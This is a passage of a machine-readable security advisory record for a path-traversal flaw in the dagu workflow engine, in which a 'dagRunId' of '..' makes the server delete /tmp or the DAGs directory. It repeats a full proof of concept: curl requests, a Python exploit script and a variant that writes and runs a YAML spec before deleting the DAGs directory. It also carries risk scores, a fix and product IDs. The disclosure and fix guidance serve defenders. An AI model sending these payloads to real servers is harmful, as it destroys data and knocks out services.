(executeDAGRunFromSpec)\n POST /api/v1/dag-runs/enqueue (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n python3 poc.py --url http://localhost:8080\n python3 poc.py --url http://localhost:8080 --username admin --password secret\n python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n payload = json.dumps({\"username\": username, \"password\": password}).encode()\n req = urllib.request.Request(\n f\"{base_url}/api/v1/auth/login\",\n data=payload,\n headers={\"Content-Type\": \"application/json\"},\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=10) as resp:\n data = json.loads(resp.read())\n token = data.get(\"token\") or data.get(\"accessToken\")\n if not token:\n print(f\"Login response did not contain a token: {data}\")\n sys.exit(1)\n return token\n except urllib.error.HTTPError as e:\n print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n body = json.dumps({\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": traversal,\n }).encode()\n headers = {\"Content-Type\": \"application/json\"}\n if token:\n headers[\"Authorization\"] = f\"Bearer {token}\"\n req = urllib.request.Request(\n f\"{base_url}/api/v1/dag-runs\",\n data=body,\n headers=headers,\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=15) as resp:\n return resp.status, json.loads(resp.read())\n except urllib.error.HTTPError as e:\n return e.code, e.read().decode()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n parser.add_argument(\"--token\", default=\"\")\n parser.add_argument(\"--username\", default=\"admin\")\n parser.add_argument(\"--password\", default=\"\")\n parser.add_argument(\"--traversal\", default=\"..\",\n help=\"Value for dagRunId (default: '..')\")\n args = parser.parse_args()\n\n base_url = args.url.rstrip(\"/\")\n traversal = args.traversal\n\n import posixpath\n name_hint = \"inline\"\n expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n print(f\"Target server : {base_url}\")\n print(f\"dagRunId value: {repr(traversal)}\")\n print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n print(f\"os.RemoveAll will target: '{expected_dir}'\")\n print()\n\n token = args.token\n if not token and args.password:\n print(\"Obtaining JWT token...\")\n token = login(base_url, args.username, args.password)\n print(f\"Token obtained: {token[:30]}...\")\n elif not token:\n print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n print()\n\n tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n if tmp_before is not None:\n print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n status, body = send_exploit(base_url, token, traversal)\n print(f\"HTTP {status}: {body}\")\n print()\n\n if status not in (200, 201):\n print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n sys.exit(1)\n\n time.sleep(0.5)\n\n if tmp_before is not None:\n tmp_after = os.path.exists(expected_dir)\n print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n if not tmp_after:\n print()\n print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n else:\n print()\n print(\"Directory still exists. If running against a remote server, check\")\n print(f\"on the server host whether '{expected_dir}' was modified.\")\n else:\n print(f\"Cannot verify filesystem state from this host.\")\n print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after: $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `.yaml` before the cleanup removes that directory:\n\n```json\n{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"name\": \"payload\",\n \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls `os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId contains invalid characters\",\n }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId resolves outside the permitted temp directory\",\n }\n}\n```\n\nThe same fix must be applied to both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.", "title": "github - https://api.github.com/advisories/GHSA-m4q3-457p-hh2x" }, { "category": "description", "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp//` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n return nil, err\n}\ndefer cleanup() // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"operator\",\"password\":\"\"}' \\\n | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": \"..\"\n }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n - name: s\\n command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n ```\n tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n = filepath.Clean(\"/tmp/inline/..\")\n = \"/tmp\"\n ```\n (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n ```go\n cleanup = func() { os.RemoveAll(\"/tmp\") }\n ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs (executeDAGRunFromSpec)\n POST /api/v1/dag-runs/enqueue (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n python3 poc.py --url http://localhost:8080\n python3 poc.py --url http://localhost:8080 --username admin --password secret\n python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n payload = json.dumps({\"username\": username, \"password\": password}).encode()\n req = urllib.request.Request(\n f\"{base_url}/api/v1/auth/login\",\n data=payload,\n headers={\"Content-Type\": \"application/json\"},\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=10) as resp:\n data = json.loads(resp.read())\n token = data.get(\"token\") or data.get(\"accessToken\")\n if not token:\n print(f\"Login response did not contain a token: {data}\")\n sys.exit(1)\n return token\n except urllib.error.HTTPError as e:\n print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n body = json.dumps({\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"dagRunId\": traversal,\n }).encode()\n headers = {\"Content-Type\": \"application/json\"}\n if token:\n headers[\"Authorization\"] = f\"Bearer {token}\"\n req = urllib.request.Request(\n f\"{base_url}/api/v1/dag-runs\",\n data=body,\n headers=headers,\n method=\"POST\",\n )\n try:\n with urllib.request.urlopen(req, timeout=15) as resp:\n return resp.status, json.loads(resp.read())\n except urllib.error.HTTPError as e:\n return e.code, e.read().decode()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n parser.add_argument(\"--token\", default=\"\")\n parser.add_argument(\"--username\", default=\"admin\")\n parser.add_argument(\"--password\", default=\"\")\n parser.add_argument(\"--traversal\", default=\"..\",\n help=\"Value for dagRunId (default: '..')\")\n args = parser.parse_args()\n\n base_url = args.url.rstrip(\"/\")\n traversal = args.traversal\n\n import posixpath\n name_hint = \"inline\"\n expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n print(f\"Target server : {base_url}\")\n print(f\"dagRunId value: {repr(traversal)}\")\n print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n print(f\"os.RemoveAll will target: '{expected_dir}'\")\n print()\n\n token = args.token\n if not token and args.password:\n print(\"Obtaining JWT token...\")\n token = login(base_url, args.username, args.password)\n print(f\"Token obtained: {token[:30]}...\")\n elif not token:\n print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n print()\n\n tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n if tmp_before is not None:\n print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n status, body = send_exploit(base_url, token, traversal)\n print(f\"HTTP {status}: {body}\")\n print()\n\n if status not in (200, 201):\n print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n sys.exit(1)\n\n time.sleep(0.5)\n\n if tmp_before is not None:\n tmp_after = os.path.exists(expected_dir)\n print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n if not tmp_after:\n print()\n print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n else:\n print()\n print(\"Directory still exists. If running against a remote server, check\")\n print(f\"on the server host whether '{expected_dir}' was modified.\")\n else:\n print(f\"Cannot verify filesystem state from this host.\")\n print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after: $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"spec\":\"steps:\\n - name: s\\n command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `.yaml` before the cleanup removes that directory:\n\n```json\n{\n \"spec\": \"steps:\\n - name: s\\n command: id\\n\",\n \"name\": \"payload\",\n \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls `os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId contains invalid characters\",\n }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n return nil, func() {}, &Error{\n HTTPStatus: http.StatusBadRequest,\n Code: api.ErrorCodeBadRequest,\n Message: \"dagRunId resolves outside the permitted temp directory\",\n }\n}\n```\n\nThe same fix must be applied to both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m4q3-457p-hh2x.json?alt=media" }, { "category": "description", "text": "Dagu: Path Traversal via `dagRunId` in Inline DAG Execution in github.com/dagu-org/dagu", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4693.json?alt=media" }, { "category": "description", "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp// path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-31886.json?alt=media" }, { "category": "other", "text": "0.00148", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5825017", "CSAFPID-5844410", "CSAFPID-5907261", "CSAFPID-5700905", "CSAFPID-5700906", "CSAFPID-5700907", "CSAFPID-5700908", "CSAFPID-5700909", "CSAFPID-5700910", "CSAFPID-5700911", "CSAFPID-5700912", "CSAFPID-5700913", "CSAFPID-5700914", "CSAFPID-5700915", "CSAFPID-5700916", "CSAFPID-5700917", "CSAFPID-5700918", "CSAFPID-5700919", "CSAFPID-5700920", "CSAFPID-5700921", "CSAFPID-5700922", "CSAFPID-5700923", "CSAFPID-5700924", "CSAFPID-5700925", "CSAFPID-5700926", "CSAFPID-5700927", "CSAFPID-5700928", "CSAFPID-5700929", "CSAFPID-5700930", "CSAFPID-5700931", "CSAFPID-5700932", "CSAFPID-5700933", "CSAFPID-5700934", "CSAFPID-5700935", "CSAFPID-5700936", "CSAFPID-5700937", "CSAFPID-5700938", "CSAFPID-5700939", "CSAFPID-5700940", "CSAFPID-5700941", "CSAFPID-5700942", "CSAFPID-5700943", "CSAFPID-5700944", "CSAFPID-5700945", "CSAFPID-5700946", "CSAFPID-5700947", "CSAFPID-5700948", "CSAFPID-5700949", "CSAFPID-5700950", "CSAFPID-5700951", "CSAFPID-5700952", "CSAFPID-5700953", "CSAFPID-5700954", "CSAFPID-5700955", "CSAFPID-5700956", "CSAFPID-5700957", "CSAFPID-5700958", "CSAFPID-5700959", "CSAFPID-5700960", "CSAFPID-5700961", "CSAFPID-5700962", "CSAFPID-5700963", "CSAFPID-5700964", "CSAFPID-5700965", "CSAFPID-5700966", "CSAFPID-5700967", "CSAFPID-5700968", "CSAFPID-5700969", "CSAFPID-5700970", "CSAFPID-5700971", "CSAFPID-5700972", "CSAFPID-5700973", "CSAFPID-5700974", "CSAFPID-5700975", "CSAFPID-5700976", "CSAFPID-5700977", "CSAFPID-5700978", "CSAFPID-5700979", "CSAFPID-5700980", "CSAFPID-5700981", "CSAFPID-5700982", "CSAFPID-5700983", "CSAFPID-5700984", "CSAFPID-5700985", "CSAFPID-5700986", "CSAFPID-5700987", "CSAFPID-5700988", "CSAFPID-5700989", "CSAFPID-5700990", "CSAFPID-5700991", "CSAFPID-5700992", "CSAFPID-5700993", "CSAFPID-5700994", "CSAFPID-5700995", "CSAFPID-5700996", "CSAFPID-5700997", "CSAFPID-5700998", "CSAFPID-5700999", "CSAFPID-5701000", "CSAFPID-5701001", "CSAFPID-5701002", "CSAFPID-5701003", "CSAFPID-5701004", "CSAFPID-5701005", "CSAFPID-5701006", "CSAFPID-5701007", "CSAFPID-5701008", "CSAFPID-5701009", "CSAFPID-5701010", "CSAFPID-5701011", "CSAFPID-5701012", "CSAFPID-5701013", "CSAFPID-5701014", "CSAFPID-5701015", "CSAFPID-5701016", "CSAFPID-5701017", "CSAFPID-5701018", "CSAFPID-5701019", "CSAFPID-5701020", "CSAFPID-5701021", "CSAFPID-5701022", "CSAFPID-5701023", "CSAFPID-5701024", "CSAFPID-5701025", "CSAFPID-5701026", "CSAFPID-5701027", "CSAFPID-5701028", "CSAFPID-5701029", "CSAFPID-5701030", "CSAFPID-5730985", "CSAFPID-5730986", "CSAFPID-5730987", "CSAFPID-5730988", "CSAFPID-5730989", "CSAFPID-5730990", "CSAFPID-5730991", "CSAFPID-5730992", "CSAFPID-5730993", "CSAFPID-5730994", "CSAFPID-5730995", "CSAFPID-5730996", "CSAFPID-5730997", "CSAFPID-5730998", "CSAFPID-5730999", "CSAFPID-5731000", "CSAFPID-5731001", "CSAFPID-5731002", "CSAFPID-5731003", "CSAFPID-5731004", "CSAFPID-5731005", "CSAFPID-5731006", "CSAFPID-5731007", "CSAFPID-5731008", "CSAFPID-5731009", "CSAFPID-5731010", "CSAFPID-5731011", "CSAFPID-5731012", "CSAFPID-5731013", "CSAFPID-5731014", "CSAFPID-5731015", "CSAFPID-5731016", "CSAFPID-5731017", "CSAFPID-5731018", "CSAFPID-5731019", "CSAFPID-5731020", "CSAFPID-5731021", "CSAFPID-5731022", "CSAFPID-5731023", "CSAFPID-5731024", "CSAFPID-5731025", "CSAFPID-5731026", "CSAFPID-5731027", "CSAFPID-5731028", "CSAFPID-5731029", "CSAFPID-5731030", "CSAFPID-5731031", "CSAFPID-5731032", 